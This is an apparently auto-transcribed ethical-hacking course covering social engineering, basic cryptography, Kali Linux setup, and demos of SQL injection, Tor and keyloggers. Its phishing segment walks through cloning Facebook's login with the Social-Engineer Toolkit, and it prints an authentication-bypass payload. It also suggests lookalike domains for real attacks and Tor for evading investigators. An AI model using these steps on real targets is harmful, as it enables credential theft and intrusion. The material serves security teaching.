Reset our passwords what do we have as a mechanism to resetting passwords we have some security questions that we set up those questions are nothing but personal information that we would know but through a social engineering attack it would be easily be able to uh gather the
Information that you have set for your security questions the security questions can be as simple as the first school that you attended you probably have that listed on your linkedin profile where a person can just go in there and see your academic qualifications and identify the school
That you were in right similarly it might also be a question what was your mother’s maiden name that’s a very good attack and that’s uh i mean if a person can interact with you let’s say they are trying to take a survey and they approach you for a feedback on a
Particular product that you have been utilizing and they ask you these questions you wouldn’t think twice before giving those answers as long as the request sounds legitimate to us we are able to justify that request we do answer those queries so it’s upon us to verify the authenticity of the request
Coming in before we answer it phishing as discussed would be fraudulent emails which appear to be coming from a trusted source so email spoofing uh comes into mind uh fake websites and so on so forth exploiting human curiosity curiosity killed the cat right so there was there’s so many physical attacks where
Hackers just keep pen drives lying around in a parking lot now this is open a generic attack whoever falls victim will fall victim so if i just throw around a few usbs in the parking lot obviously with trojans implemented on them some people who are curious or who
Are looking for a couple of freebies might take up those pen drives plug them in their computers to see what data is on the pen drives at the same time once they plug in those pendrives on their computers the virus or the trojan would get infected and cause harm to their
Machine then exploiting human greed we just talked about the nigerian frauds and the lotteries those kind of attacks the fake money-making gimmicks now basically this is where you prey upon the person’s greed kicking in and they are clicking on those links in order to get that money that has been
Promised to them in that email so one of the safest mechanism to keep data private and to keep yourself secure is using encryption now encryption can happen through cryptography what is cryptography cryptography is the art of scrambling data using a particular algorithm so that the data becomes
Unreadable to the normal user the only person with the key to unscramble that data would be able to unscramble it and make sense out of that data so we’re just making it unreadable or non-readable by using a particular key or a particular algorithm and then we’re
Going to send the key to the end user the you end user using the same key would then decrypt that data if anybody compromises that data while it is being sent over the network since it is encrypted they would not be able to read it so the encryption algorithm would be
Something like this now if you see uh the computer word once made into unreadable format would look like e q o r x v g t for the end user it wouldn’t make any sense but the person who has a key to unscramble that would be able to convert it back to
Computer and then understand the meaning of that word so this is just a substitution cipher that is being shown on the screen so what is the alphabet the key is alphabet plus three so c plus three alphabets that becomes e o becomes q m becomes o so the key that is
Utilized to scramble the data is the character that you are at the third character from there would be the corresponding key so the encrypted message is also known as a cipher the decryption is just the other way around where you know the key now and you can
Now figure out what that e corresponding to by going back three characters in the alphabet most of the times a certified ethical hacker must decrypt a message without knowing the secret key so let’s say a ransomware has affected your organization or has affected a device
And you want to figure out uh or you want to decrypt that data now as an ethical hacker you wouldn’t be for paying a ransom to the hacker would you so it is now your prerogative of how you’re going to work around and how you’re going to try to crack the
Encryption mechanism how to crack the cipher to decrypt that message and see what’s within it right decryption without the use of a secret key that is known as a cryptanalysis cryptanalysis is the reversing of an algorithm to figure out what the decryption was without using a key so cryptanalysis can
Be done using various formats the first one is a brute force attack second is a dictionary attack the third one is a rainbow table attack a brute force attack is trying every combination permutation and combination of the key to figure out what the key was it is 100
Successful but may take a lot of time a dictionary attack is where you have created a list of possible encryption mechanisms a list of possible cracks and then you try to figure out whether those cracks work or not rainbow tables are where you have an encrypted text in hand
And you’re trying to figure out uh the similarities between between the text that you have and the encrypted data that you wanted to decrypt in the first place so in the brute force attack you’re trying every possible combination permutation of what the key would be in dictionary attack you have a word list
That would tantamount to the key and if you’re you’re trying to match all the words listed in the text file or the word list to see if any of those words are going to work to decrypt that data here in the rainbow table the ciphertext is compared with another ciphertext you
Find out similarities and then you try to work or reverse engineer your way accordingly so let’s have a quick demo on cryptography before we begin this session so to begin with the demo of cryptography we are on our website called spammic.com which will help us scramble the message that we created
Into a completely uh format which would be unrelated to the topic at hand so if i say i want to encode a message i turn a short message into spam so what this does is you want to send across a secret message you type in the secret message a
Short one it will convert that into a spam mail you send it across so whoever’s reading that spam mail would never get an idea of the embedded message within it so if i want to type in a message here hi this is a secret message the password is asd at the rate
One two three four and i want to send this out to people or to one of my colleagues but i want to send it out in a secret manner so that others are not aware of this so when i press on encode what the algorithm would do is it will
Convert this message into a spam mail so my message hi this is a secret message the password is at the rate one two three four or asd at the rate one two three four gets converted into this now if you read it dear e-commerce professional this letter was specially
Selected to be sent to you this doesn’t make sense there is nowhere or no reference to the actual message that i’ve already said so if i copy this entire message and i send it let’s say via email to the recipient now the thing is that the recipient needs to know that
I’ve encoded it using spam mimic the algorithm remain needs to remain the same so once they know that it is spam mimic what they can do is now in this instance what i’m going to do is i’m going to open up a new browser and i’m
Going to go to the same website and at this point in time i’m going to click on decode when i click on decode i’m going to paste the message that i have just copied there we are and this message is now being copied into a different
Browser and if i decode this you will see that it will convert it back to the original message that there was so the key is there at spam mimic and it is embedded within the message so whenever we paste the message in the decode factor it knows what the key was and it
Can decrypt that message and give me the actual message that was embedded within it there we are the entire message this is what we created in the google chrome browser and in the firefox browser we decoded similarly if i want to protect these kind of messages there is an
Aspirin encrypt.com website where let’s say we use text encryption and i want to encrypt the same message this is a secret message the password is asd at the rate one two three four and then i give it a password to protect this message let’s say the word password and
I use the cipher to scramble this by using let’s say aes which is the strongest cipher right now and i say encrypt so this is what the encryption would look like and basically if i don’t have the password over here if i decrypt it you would see that the error has
Occurred if i type in the password over here and then decrypt it it will be able to convert that back into the unscrambled text and it will give me what the original message was this is a secret message the password is asd at the rate one two three four so if i want
To keep my data secure from hackers i want to scramble it in such a way that they would not be able to crack it or it would be very difficult for them to crack it and this is one of the first mechanisms that would be recommended by
Any ethical hacker to keep the data secure now let’s talk about downloading and installing kali linux along with that we’ll also be looking at the basic commands that are required for kali linux all right so i’ve opened my browser and we want to go to the kali
Website so we want to go to dot org you can directly type in kali.org and go to the website i can just do a google search and say kali download and it will give you the same website but it will directly take you to the downloads pages so either here and
Or you can go to the home page uh cookies are being installed on your machine so see which cookies you want to allow i’m only going to use the necessary cookies to support the site and you can see that this gives you the latest kali linux news and tutorials
Gives you the latest release what is in that release and gives you a lot of documentation which will help you understand what tools have been developed and what functionality has been given in the latest version if you want to download you can directly go here and you can download kali linux now
Kali linux is a 2.6 gigabyte download so it’s going to take time the latest version being 2019.4 and we click over here i’m using a download manager to manage all these huge downloads and you can see it’s pointed to the operating systems folder and it is going to be a 2.57 gb download
So you click on download and in the background uh you can see this is going to be downloaded and you’re going to minimize this and it will take a few minutes for that to download but this is an iso image so we need to install it on
A virtual machine so what we need is we need to use a hypervisor which will allow us to create virtual machines so we can either use vmware workstation which you can download from here however this is paid version so you can see it is around 250 or something for this
Software but it is a very good software to have so if you click on download now it is going to start the download it’s a 30-day trial period if you want to use it after 30 days you’ll need to enter the key which you’ll get after purchasing the software if you do not
Want to utilize this the free version that you have you can either download vmware player but there are some limitations for vmware player that you might want to look at does you want to compare these products before you want to purchase them right otherwise you can download oracle virtualbox which is a
Free hypervisor it’s not as robust as vmware workstation but it does the trick right so the the free version 6.1 is free and you can then create your own virtual machines over there and install operating systems on them what i do have i already have a vmware workstation
Installed so i’m just going to open that up and that’s my vmware workstation as you can see i already have a lot of virtual machines created over here what we are going to do is we are going to configure a virtual machine for the kali linux operating system that we are
Downloading which should be somewhere here let’s see it’s at 43 percent so halfway there till then let’s create the virtual machine so i click click on file create a new virtual machine i’m going to customize the machine so click on next this little default we don’t want
To change that and then we want to install the operating system later we don’t want to point it out right now so i’ll just click on i will install the operating system later click on next we want to install linux now in the drop down you would not see kali linux over
Here however you can choose ubuntu 64-bit that’s what i’m going to choose there it is next what is the name that we want i want to give it kali linux without the typo and i want to store it in one of the folders that i’ve created by default it stores
On the c drive which is not a good place to store uh you don’t want to run out of space on your c drive so i’m going to click on this pc and this is my data and in here i’ll have a folder called virtualbox or virtual
Machines there it is within which you can see the other software that i already created i’m going to create a new folder and call it kali 2019 l l for is latest for me because you can see already have a kali linux so i’m just going to identify this folder with the l
At the end going to select it and click on ok you can see the path being changed over here click on next it’s going to ask you how many processors now depending on the processor that you have you can see i’ve got a 8 core i7 so if i
Give it 16 cores or 16 processors that’s not going to work i cannot go beyond what the physicality already is so for this machine one processor with one core is more than enough if you’re going to load use a lot of tools at the same time
You might just want to give it two cores so given it two cores it will ask us for ram to be provided for this virtual machine by default 2048 megabytes that’s 2gb of ram is more than enough if you require more we can change this later on
So click on next we want to use nat for now leave this default next whatever is recommended keep it the way it is we do not want to change it next create a new virtual hard disk for this machine and it is going to ask us the size 20 gb is
More than fine store it as a single file you don’t want to use multiple file options click on next and then click on browse where we want to store the vmdk file or the virtual hard disk file and we go back again to the same folder that
We had created virtual machines and we look at the kali linux kali 2019 l and we want to store the vmdk file over there once we save it we want to click on next and then we want to click on finish so this is the virtual machine
That has been created right here right now this is the basic configuration now where are we at with the operating system and you can see the operating system has been downloaded and it is stored in this particular folder so we go to e drive so we are looking for the
Sub the operating system that we have downloaded we download it in the operating systems folder and if we go in here you can see the current one the kali linux 2019.4 iso right here so what we do we go back to the kali linux machine that we have created edit virtual machine
Settings and we point this virtual machine using the cd dvd and then we point the iso the one that we downloaded over here so we go back to e drive we go back to os and we click on kali linux 2019 click on open so now when this
Boots up it will boot up with this iso and then it will allow us to install the operating system so click on ok then we click on power on this virtual machine it will start powering on it will boot to the iso and it will start giving us
The booting options so i’m just going to enter the full screen mode over here for this to be better visible and we don’t want the live mode what we want is we want to use the graphical install and then we highlight that we press enter and you can see the setup starting up
We’ll wait for the gui to pop up there it is which language do we want for now we want english click on continue where are we located click on continue and the configure your keyboard we want the us keyboard american english continue it is going to detect the
Hardware so as you can see on the screen it’s attempting a auto configuration for most of these uh settings the network with dhcp it has identified the network cards uh hardware like uh the processor that has been provided but is asking for a host name we’re going to leave it at
Default we’re going to click on continue domain name i’m not joining this into a domain as yet there’s going to be a standalone machine so i can leave this blank click on continue now it is going to configure the network it is asking for a password at this point in time the
Root password type in any password that you want ensure that you remember the password now by default the username for the account is the name is the word root we are just creating the password for the root account and then we want to click on continue setting up the clock
Looking at the hard disks now here it asks us do we want to use the entire disk the 20 gb virtual hard disk that we had provided or do we want to give it a manual configuration or a guided one where we want encryption and a logical volume management coming into the
Picture you’re just going to use the first option guided you use entire disk don’t worry it’s only going to use the virtual disk that we had created click on continue it will give us that it’s a 21.5 gb vmware virtual disk that we had and click on continue all files in one
Partition that’s what you want recommended for new users whatever it is we don’t want to change these folders continue and this is what we have configured once we click on continue it is going to say you are you sure you want to make these changes click on yes
Click on continue and it will start installing kali linux on your device now this is going to take a few minutes for the installation to work all right so that’s the installation that’s completed now it’s asking us to configure a package manager a network mirror can be
Used to supplement the software that is included on the installation media this may also make new versions of software available you want to use a network mirror we can click no for now and then click on continue now this is going to install the grub bootloader this might
Take a few minutes as well install the group grub loader to the master boot record yes click on continue click the hard disk that you have just utilized this is the one click on continue it will install the grub book loader running through the last phases of the
Installation and now it says the installation is complete we want to click click on continue finishing the installation and then it will do a reboot all right and you can see this is starting up so we are going to use you just wait out the boot and now it
Started the booting sequence just going to maximize the screen and you can see it’s asking me for the password this is the one that we created now that’s the that’s not the password that’s the username that’s the root and the password that we had created at that
Point in time and then click on login and this is your screen uh now what we need to do here is we need to install vmware tools which will help us manage the screen and help the virtual machine to be a little bit better integrated on the system so that’s
Not mounted yet so we’re just waiting for it to mount there it is and what we want to do here is open vmware tools upgrader all right so what we want is we want to extract or we want to use this open x archiver and once we do that
We’ll see the vmware install dot pl double click on that all right we’ve got the vmware tools here what i’ve done is we have extract 2 and i’ve extracted that on the desktop right so what we just did was click on the desktop over here open and this is what it will do
And click on extract now that is happening because i’ve already extracted this open this up we want to run this vmware install.pl so what do we do we open up the terminal window which is the command line interface over here and now this is where some of the commands come
Into the picture so for example pwd will show us the present working directory ls will show us the list of the folders that are there so the folder that we have is on our desktop so we’ll just change directory to desktop press enter do an ls that will show us the list and
You can see vmware tools distrib that’s the folder that we have right here right so we want to go into that folder see the vmware at this point you can just click on tab and it will populate everything over there press enter do an ls and we want the vmware hyphen install
Dot pl to be executed all right so we tried executing that command we had an error over there so what we need to do is we need to execute this command so dot slash vmware hyphen install.pl and we’ll start creating now uh it will ask you for your
Input installing vmware tools in which directory do you want to install the binary files uh by default it is going to use slash usr slash bin if i just press enter it is going to use the default as you can see the input over here what directory do you want the init
Directories i’m just going to press keep on pressing enter for the defaults to come in this part does not exist it is going to create it default yes defaults everywhere and then it tries to start initializing it to maximize the screen and this is where it is installing and
You can see by just installing that it automatically adjusted the screen and now we got a full screen of kali linux right here right and that is what vmware tools does for us once we have installed the operating system and now you can see the entire screen on here you will see
The tool sets that are given here now why are we using kali linux in the first place because this comes in uh with a bundle of thousands of softwares that are ready to be utilized for ethical hacking right and they have been categorized over here for information gathering vulnerability analysis web
Application analysis and so on so forth so you can see from forensics onwards reporting tools and as you scroll down you can see a development tools graphics coming in internet and the system configuration coming into the picture these are your settings for your operating system so these are basically
Your tools we are right now the favorites if i click on information gathering you will see that other tools for information gathering start appearing over here for vulnerability analysis we have got sparta and map fuzzing tools web application analysis we have got comics skip fish sql map database assessments password attacks
And so on so forth so if we just go in the favorites this was the terminal emulator that we utilized is the command line that we saw we used the cd command we used the pwd command we did the ls command as well to give us the list of
The directory that we are in similarly there would be commands like cat so let’s go to cd downloads let’s see what the uh what’s there they can see this case sensitive so if i type in a capital d and then do a tab ls there’s nothing
Over here on download so cd dot dot will take us back one directory i can see we are back from downloads to root if i want to go to desktop this is how i go to desktop do a ls you can see the vmware tools uh folder over there cd
Vmware tools and we go into that folder ls which will give us the list of all those files now you can see install is a file that we had edited back then so if i do a cat install you will see the cat basically is the command that will help
Us look at the contents of the file all right without opening up the file without editing the file so you can see just uh if i scroll up this is where we give the cat command it then printed the contents of the file over here and then it exited and gave me back
To command line right here right now if i want to copy this cp root desktop vmware install and if you want to copy it to root downloads and press enter now what we are going to do is we are going to see if this file the install file
That we just edited over here has been copied to the downloads folder so we do us we are currently in the vmware on the desktop vmware tools district folder video cd dot dot that takes us down one directory so we are still in the desktop
Do a cd dot dot now you can see we are back in the root and now we are going to do a cd downloads do an ls and you can see the copied file right here so if i do a cat install you can see the same
Content of that file coming in so these are some of the commands that we would need to learn as we go ahead the remove command is let’s say we’ve got install we do a man rm man is the manual page command that gives us the pages with the description
Of how that particular command is to be utilized so rm is remove files or directories synopsis is the description the options hyphen f4 hyphen i for prompt hyphen capitalize prompt once before removing more than three files and so on so forth if you want to exit this you can
Press q to exit and you come back to this page so if i say rm install ls you will see that the install file has now been deleted so in windows we use the del del command in linux it is the rm command so this is what we wanted
To look at the demo for kali linux how to download it how to install it and some of the basic commands that we can utilize all right let’s begin with the phishing uh tutorial we have the kali linux operating system booted up over here uh what we are going to do is we
Are going to open up a tool called set social engineering toolkit which you would find in this option and that’s the tools that we want it’s a command line tool a menu driven tool we are going to host a fake facebook page and you can see how we can harvest credentials by
This kind of an attack so these are some disclaimers you might want to go through that do you want to agree to the terms of service yes press enter and that’s your social engineering toolkit and we are talking about a phishing attack which can comes under the social engineering attack so
It like i said it’s a menu driven tool so we just have to look at these options and then just type in the number of the option that we want so we want to do a social engineering attack so i type in one press enter in that it is asking me
Whether i want a spear phishing attack a website attack vector we are going to choose a second option so i type in two press enter and then it asks me uh what i want to do i want to take the third option here credential harvester attack
Methodology and we want to do the third attack now it is asking whether we want to use the in-house website templates that it already has or do we want to clone a site or do we have a customized site that we have prepared that we want to migrate into this tool if you’re
Going to do the site cloning option so we’re going to type in two press enter and then it is going to ask me the ip address where it wants to capture and store the credentials by default this is the ip address that i’m using so if i
Leave it blank it will take my default ip address so i’m just going to press enter and now it is asking me the url to clone so i type in https www.facebook.com what it is going to do it is going to connect online and it is
Now you just it has cloned the website uh facebook login.php the best way to use this attack is that you if you use the if the username and password form are in the same field or the same page regardless this captures all posts on a website so you may need to copy www.star
Into html depending on where your directory structure is press return if you understand what we are seeing here so press enter the social engineering toolkit credential harvest attack is running on port 80 information will be displayed to you as it arrives so the site was 71.134 right the default ip address and
This is where the website is being hosted let’s check that out so let me open up a browser on my host machine and let me point it to the kali linux machine that we have just created 192.168.71.134 and you should see a login to facebook coming up right here looks genuine it is
Genuine because we just went online and downloaded this let’s just have a recap let’s have a explanation of what we are trying to do i am trying to host fake facebook page on my server which has an embedded script in it which is going to do credential harvesting so the attack
Here is let’s say if i’m now hosted this i can craft a fake email send it across to a victim saying uh your facebook account has seen some unforeseen activity create a hyperlink using html coding within that click here to access your account and verify uh that the
Account is secured and when they click on that link they will be redirected to my fake page which is here you can see the ip address is my virtual machine’s ip address but i’m seeing a facebook login page and i’m going to type in someone at somewhere.com and the password i’m just
Going to type in the regular ones that i use and if you see it when we typed in uh the username and password the page just refreshed and gave us the login page again but now if you look at the url i’m actually on facebook’s login
Page which is exactly the same that i was hosting so a layman wouldn’t probably figure out they’ve been hacked by now they just would figure out okay they probably typed in the incorrect password and the page refresh or something like that and they’re just going to log in and they’re actually
Going to access the facebook page thus they might not even realize that something went wrong but if i go back to my virtual machine you can see that it has captured some data and it is reporting over here of what has happened so if i just scroll up let’s see what
Happened here and if you have been able to capture anything so we gotta hit printing the output this is the http 1.1 200 okay response coming in password field phone and we just looking there it is email someone at somewhere.com and uh password that i typed in asd at the
Rate one two three four so it has captured the username and the password right here uh once you’re done i mean this is the way attackers work now this is a very basic attack again uh in the actual trainings you would then look at how you would host this on a real
Website make it a global attack right now it’s a virtual machine with a class cip address so here the thought process is where can we get a free hosting where we can host this kind of sites maybe i’ll have to purchase a domain which looks like similar to facebook or the
Victim that i’m trying to attack so this is just a poc so we just wanted to find out if we can how phishing is done and this is exactly how it is done right so pressing ctrl c would exit this tool and takes you back to the actual menu press
99 99 to exit and there it is close the two window and that’s the fishing practical after fishing let’s talk about sql injection sql injection stands for structured query language interaction which is a database attack though it resides within the application so it’s the application vulnerability that we
Are trying to look at to try to bypass authentication as the name suggests a sequel injection vulnerability allows an attacker to inject malicious input into a sql statement what is a sql statement a query that is used by an application and is fired off to the database database executes that query gets that
Information that is required and sends it back to the user if the user is authenticated so we’re going to look at the sql injection attack demo here and uh what we are going to do is we are going to go back to our vmware workstation and i have got a tool over
Here called ovasp broken web application which is a utility that has been created for people like us to test our skills to learn on how we can develop our skills further so this has a lot of vulnerable applications built within it we’re just going to try to access it and we are
Going to see if we can create a sql injection attack just waiting for it to boot up once it boots up it will give us an ip address there we are so we need to connect to 71.132 so i can just use the same browser i was
Using close up facebook and now go to 192.168.71.132 and this is the ovas broken web application project uh what we’re going to do is we’re going to go to utility and this is a application that has a lot of information within it you can see it
Gives you links about what you should do help me video tutorials listing of vulnerabilities that they have and so on so forth so you can see we are not logged in right now i’m just going to do this as a demo so what we’re going to do
Is we’re going to look at this and bypass authentication so we are taken to the login page where you need a username and password to log in i’m going to type in test as the username and test as the password click on login and you can see
That account does not exist so the authentication mechanism works now what we want to do is we want to create a query now what does a query look like when i type in a username and a password if i just type in a single quote here it
Is going to create an error and this is what the sql query looks like select username from accounts where username is a single quote and then the exception error happened so it did it’s not showing the rest of the query to us now what i’m going to do is i’m just going
To craft a query here a single quote and give it a condition or one equals one space hyphen hyphen space what happens hyphen hyphen space is comments out anything after that so the password field is being commented out at this point in time and i’m just giving it a
Condition where the condition is true one does equal one and if this condition is true it is going to allow me to log in so you can see right now we are not logged in this bypasses the authentication mechanism and you can see user authenticated and we are now logged
In as admin so uh in the training what we need to understand uh as a whole is how sql works what are the queries that are structured with how you can what are the testing operators now the single quote that we used that was an operator in the sql syntax what these operators
Are how they function and then how we can leverage these attacks there are different tools that are given to you in kali as well that you can utilize so in kali linux you can just open up a command prompt and there’s a tool called sql map you need to give it a particular
Site so sql map hyphen u for the url and whatever the url is now url here and then once you’re here you just press the enter key this tool will craft all the queries in the background for you you don’t even have to no sql query or sql
Languages uh this is a very easy tool to utilize sadly i cannot demo this on a live website because that would be illegal but you can see how you can operate this yourself that’s what sql injections are all about moving on we now talk about uh vpn’s virtual private
Networks and a virtual private network is basically a secure network that allows me to anonymize myself over the internet so what i’m doing is i’m connecting from here to a server that encrypts my channel encrypts my connection and does allows me to keep my data secure now the basic essence of a
Vpn or a virtual private network is to allow me this encryption mechanism where i can encrypt and safeguard my data the added advantage that nowadays a vpn gives is that you can allow us to spoof our ip address or obfuscate our ip address so we can actually become
Anonymous on the internet it can allow us to use multiple ip addresses and does secure ourselves on the internet for example i use vpn called cyberghost and what this allows me to do is it allows me so many servers over here if you look at the entire list all the servers then
There are no spy servers which and guarantee me that they are not going to keep and store any logs and thus they are not going to record any of the activity that i’m doing right since they are located out of romania this becomes a little bit more safer for me because
The government and the laws over there are a little bit more relaxed than other countries uh they give me uh different links for torrenting for streaming for connection features so there are a lot of vpns out there so for example let’s go to the website cyberghost.com so we can see there’s a
Sale going on 76 percent sale or you can go on to express vpn which is also very good vp and then there is not vpn it depends on what you want and how you want to utilize it so just purchasing a vpn or getting a free free vpn is not
Enough it depends on which country the vpn originates from and which server you are connected to for example most of the countries have a pact where they share information amongst themselves even if you’re connected to a vpn that means that these companies that provide these services have to generate and store logs
And these logs have to be reported to the government if they ask for it now if there’s a list of 14 countries that actually uh focuses on this practice so you have to find out vpn that and a server that is not a part of those 14
Countries and ensure that those logs are not going to be reported to the government and these are three vpns basically are something that which are good and i personally use cyberghost i have used the others i just keep on rotating them just to get an idea of which one is better so
These are vpns that can allow you to anonymize yourself on the internet moving on these are the ones that we talked about there are other safer vpn hide my ass expressvpn and so on so forth from our terminologies let’s now talk about vps vps is basically virtual private server
Where you can rent a service or server as a service a virtual machine as a service so basically on a cloud using infrastructure as a service you can rent a server and utilize it for whatever activity you want so let’s go to uh these sites register.com good id network
Solutions or we can talk about other cloud solutions as well so here you can get register your domain names so in the previous exercise for let’s say when we talked about the phishing exercise uh what we want is we can go on to register.com or we can go on to
Godaddy.com and we can purchase a particular domain for example something like this instead of the o’s i’m typing in a couple of zeros for the facebook and see let’s see if anything of that is available now something dot photo is available or facetips.com is available uh there other
Options that are making over here that they’re giving us over here and once we purchase this we can then have our own hosting uh with our web hosting as a service and uh you can have a linux based hosting or a windows based hosting depending on what you want and that’s
Where your shared hosting comes with the picture if you just want uh if you want to look at a virtual server and you want to render server over there itself you can move on to rackspace rackspace.com and here in your services you can have physical server or a
Virtual server in a public cloud your other cloud providers for example would be amazon aws and on aws you can basically look at ec2 elastic compute cloud which is basically virtual servers in the cloud and over here you can rent out a server with whatever capacity you require you’ll obviously have to pay
Rent for what those servers are going to cost but once you have those servers you can then launch any services on top of it looking at other services that we have we talked about tar tor is a onion routing software that allows users to browse the web anonymously so we can
Just go online and we can try to spoof our identity and i’m going to show you how so i’ve got a vmware workstation right here the one so we’re just going to pull that up and we’re going to power on a windows 7 machine where we’re going
To look at the onion routing so windows machine has booted up we’re just going to log in and this is my windows 7 machine now i’ve got a chrome browser right here and we’re going to go to a website called cmyip.com which is going to give the ip address that i’m
Currently using so right now i’m not on connected to any vpn or anything and you can see that’s my ip address that i’m utilizing now if i want to anonymize myself what i’m going to do is i am going to use star and that’s the tower browser
That’s set up right there if i click on it it’s going to open up the software and it’s going to create a new network and it’s going to connect to the tor network and allow me to anonymize myself right so that’s the tool browser opening up and
Giving me a new browser over here so i’ve got one which is the old one which is uh my current ip address if i just refresh that you’ll see that i’m still on the same ip address as far as this browser is concerned there’s a refresh
And it’s still showing me the same ip address where if i go on to thor right now and if i go to see my ip.com you will see that it is going to give me and you can see the amount of time it is taking to reach that site that’s because
I am using a vpn and there’s a lot of encryption running off and you can see now i’m certainly connected via hong kong and even to reach this site what tor does is it gives me a proxy chain a proxy chain is where it creates multiple
Hops to hide my identity and before i reach see my ip.com i am using three different ip addresses over here one in france one in germany and one in hong kong so if i do something over here to trace back my steps to my actual ip address the law enforcement agencies or
Anyone who is going to search like a forensic investigator would have to go through these ip addresses before they come back to me now it’s not impossible but the effort and time that’s going to be taken to come across three different countries is going to be phenomenal so
It may just defeat the purpose of having so much resources spent to identify who did what so that’s what torque does for us all right moving on from tor we are going to look at keyloggers keyloggers are basically softwares that run in the background and record all the keystrokes
Of the user so if i’ve got a keylogger installed right now whatever i type will be stored in a text file for the hacker so that they can look at it later on and just to give you an example of that we go back to my vmware workstation and we
Open up another windows 7 machine i’m going to power this on and i’m going to close this one to them so this virtual machine has booted up we are going to use user one login as user one just close all these softwares which are not required and once this machine is booted
Up what we’re going to do is i’m just going to open up a random websites and see what we’re doing basically there’s a keylogger that’s there in the startup that’s going to record our keystrokes and we just want to see what it actually does now firefox is getting updated so let’s
Hold on now this is the latest version of firefox right and we’re just going to go to let’s say facebook.com wait for the website to open up all right let’s try opening it up again and that’s facebook.com and we’re just going to type in some random username and password somewhere someone at
Somewhere.com and the password being again asd at the rate one two three four five six seven eight nine zero log in obviously that login is not going to work user probably doesn’t exist or if it does the password probably is correct incorrect and uh so we’re going to close
This we’re going to let’s say open up another browser window go to another site uh reddiff.com and then go to red if mail try the same thing over here someone at somewhere.com password is one two three four five six seven whatever it is don’t say we can see the combination is incorrect now
There’s a key logger running in the background and what we want is we now want to open up the keylogger now it is visible here because i’ve kept it visible you can hide it in the start menu and there’s a shortcut key for you to pull it up later on so this
Completely becomes invisible and what it can do is it basically creates a record of whatever you have been doing so far so you can see these things populating on the 25th of december so if i look at the visited website you can see i opened up mozilla firefox the
First where it uh there was a problem loading the page then we opened up facebook then we opened up reliefmail.com and so on so forth said this it just gives me the list of visited websites whereas if i look at keystrokes and clipboard you will see
Whatever we have typed in so we first typed in facebook.com then again uh the second time i try to type in then i hit backspace then i type in facebook.com and then you can see i typed in someone at somewhere.com and then tab ast at the rate one two
Three four five six seven eight nine zero we closed up the browser we opened up a new one and we went on to rediffmail.com and then you can see me typing this one then going back one space then the rest of what i typed and then the password coming in so that’s
What a keylogger does if you look at the taskbar it’s not going to show you a keylogger running in the background it’s in processes you’re not going to see anything at all but it’s going to mask itself as a service so if you look into the properties you can see that icon
Coming in over here which matches this one and so you can see that this is masking itself as a service dot exe if this gets hidden as well it would be very difficult for a user to even identify this all right so that’s what a key logger is moving on let’s see what
Else we want to talk about so we’ve talked about tor we have talked about key loggers and now we want to talk about firewalls now for keyloggers to be prevented we need antiviruses right so we need a good antivirus program that’s going to be installed updated and run on
A regular basis to protect ourselves from malwares but what about network connections and you need a firewall and a system to prevent or to detect what kind of connections are going on in the first place now we cannot rely on software’s 100 percent so even if a firewall is not configured properly
That’s that’s going to be a problem so what we need to do is we have to have a firewall configure it correctly and then allow and disallow certain activity from of uh happening and what we’re going to do is i’ve got such a system on my machine here i use a software called
Glass wire what it does is it is a network analyzer so it allows me to analyze whatever is going on you can see all the apps that i’m utilizing and how much upload and download they have been doing all the traffic so you can see the protocols that i’m utilizing so i come
To know what’s going on in the background and this gives me the entire graph of how much i have been doing for the past 24 hours past three hours past five minutes and so on so forth right so this is what the activities and these are the alerts that it has been
Generating i can click on those alert and it will start telling me what it was all about if the graph doesn’t work for me it gives me usage as well so how much i have utilized since i’ve installed this software right and what applications have been utilized which
Hosts i’ve been connected to and the traffic type that was utilized and then the things on my network so these are the devices that i have currently on my network that has been that have been identified and then comes the firewall so on the firewall the firewall is
Clicked on you see all those services that have been identified and you can just click on a particular service to lock that service so this becomes a discovery tool identifies whatever networking is going on gives me all that information and then i can look at and i
Can just click on any of these services that i find it as malicious and block them i can create different profiles for different applications as i am as and when i want them and these are the alerts so you can see that this was the first time a network connection was
Looked at from vmware and what this allows me to do is whenever i execute a file it can upload it to virustotal.com and scan it as a third party antivirus to ensure that there is nothing malicious on it so i already have an antivirus over here but if this ever
Gets compromised i still can rely on a third party service where in real time as an and when i execute my applications uh they would be verified and i would be assured that nothing is wrong with my system and this software that i’m utilizing glasswire basic is free and
Then there are paid versions as well it’s just glasswire.com is where you’re going to find this moving on rootkit rootkits are also malicious softwares that you allow an unauthorized user to have access to a computer to restrict areas of its software now a rootkit in is a census which a software a malicious
Software that infects a machine and prevents a from some functionality from it like hiding data or preventing users from running antiviruses and it’s basically a malicious software that is used to hide information from the victim so that they would not realize that they have actually been compromised it’s
Going to be a difficult showing of a root kit so i cannot show that demo to you so we’re just going to move on and we’re going to talk about ethical hacking techniques now now when we say ethical hacking techniques we want to look at what kind of audits are
Available when we want to do ethical hacking so there’s a black box audit a white box audit and a gray box audit so if i’m invited in an organization to conduct a test to conduct a audit to conduct a vulnerability assessment or a penetration test to identify vulnerabilities and then try to plug
Them out they are going to give me three different variations in a black box audit they are not going to tell me about the infrastructure they are not going to give me any information and they want me to start from the basics of gathering information identifying the systems and based on the information
That i gather whether i’m able to develop any hacks and compromise their infrastructure so it will be a simulation of a hacker who’s sitting outside the organization and trying to find a way in whereas a white box audit is where full infrastructure knowledge is given anything and everything that is
Required for an audit is given and this is a simulation of an insider attack a person sitting inside the organization misusing their permissions and then trying to compromise trying to get access to data that they do not have access to so the simulation is from a malicious insider a gray box is where
Some partial knowledge is available and from that partial knowledge you’re going to try to build up more information and then you’re going to try to get access to those resources what are the tools that we utilize so we’ve already had a couple of demos on keyloggers sql
Injection sql map and so on so forth metasploit is a very much used tool for penetration testing and having knowledge on metasploit is very much necessary as far as ethical hacking is concerned nmap this is a tool used for network discovery necessarily scanner wireshark is a packet capturer
That allows you to capture packets and analyze whatever is going on sql map is something that we have seen a sql injection attack tool which uh generates its own queries and john the ripper is a password cracking tool uh bactrack used to be an operating system that was utilized for penetration testing however
Backtrack has now been replaced by something called kali linux and that’s the operating system that we have utilized in all our demos where we tried to look at sql map and those injection attacks that we did so what are the areas of ethical hacking we have just
Talked about all these areas as well network services we looked at the glasswire application that showed us how my machine is consuming networks which protocols are being consumed how the connections are being created if somebody’s able to install a trojan on my machine it is going to try
To create a new connection on the network with the hacker to allow that hacker a backdoor access now if i have that glass wire or a similar firewall implemented it is this wire wall that is going to detect it and prevent that connection from happening so if i
Install a software that is certainly suspicious or that install something else in the background that i may not be aware of that tool is going to identify all the connections that are being made and it is going to highlight that connection i need to go through all of those connections and identify whether
